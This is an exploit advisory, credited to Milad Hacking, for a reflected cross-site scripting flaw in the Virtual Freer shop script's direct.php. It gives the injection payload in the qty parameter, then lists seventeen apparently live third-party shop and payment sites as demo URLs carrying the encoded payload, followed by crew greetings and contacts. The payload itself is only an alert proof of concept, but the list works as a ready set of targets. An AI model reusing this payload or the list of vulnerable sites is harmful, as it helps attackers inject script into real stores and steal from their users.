Virtual Freer Reflected Cross Site Scripting

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Virtual Freer Reflected Cross Site Scripting
[+]
[+] Exploit Author: Milad Hacking
[+]
[+] Discovered By: Milad Hacking
[+]
[+] Vendor Homepage : http://freer.ir/virtual/
[+]
[+] Date: 2016-03-01
[+]
[+] Tested on: Kali Linux / lceweasel
[+]
[+] Software link : http://freer.ir/virtual/download.php?action=get
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Screenshot : http://up.ashiyane.org/images/sg53t4duy1n2g5xnfwm5.png

[+]  Location : site.com/direct.php?card=[cartid]&qty=1"><script>alert(/xss testing/)</script>

[+] Demo :


http://shop.azcam-ultra.ir/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://usaid.ir/Foroshgah/direct.php?card=21&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://inet2.ir/direct.php?card=12&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://pay-me.ir/direct.php?card=5&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://pingbaz.ir/shop/direct.php?card=1&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://tx149.ir/shop/direct.php?card=7&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://shop.mihannod.ir/direct.php?card=7&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://store.parseset.ir/direct.php?card=3&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://tx166.ir/shop/direct.php?card=25&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://instaliker.ir/store/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://support-sara.tk/pay/direct.php?card=22&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

https://mokhaberat.net/factor/direct.php?card=1&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://pinguin.ir/direct.php?card=12&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://www.pay-ment.ir/direct.php?card=2&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://vip.irantournament.ir/direct.php?card=44&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://anaz.ir/mellat2/direct.php?card=44&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

http://shoping.hanakala.ir/direct.php?card=24&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E

Ya FaTeme Zahra

[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]

Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi
- irhblackhat - Distr0watch - N3TC4T - Ac!D - Mr.G}{o$t  - MRS4JJ4D  -  Nazila Blackhat -  Bl4ck_MohajeM  -
 Ehsan Hosseini - Ali Inject0r - Peyman C4t And All Ashiyane Digital Security Team

[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]

Greetz to: My Lord Allah
https://telegram.me/thehacking
http://upbash.ir
milad.hacking.blackhat@Gmail.com
[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]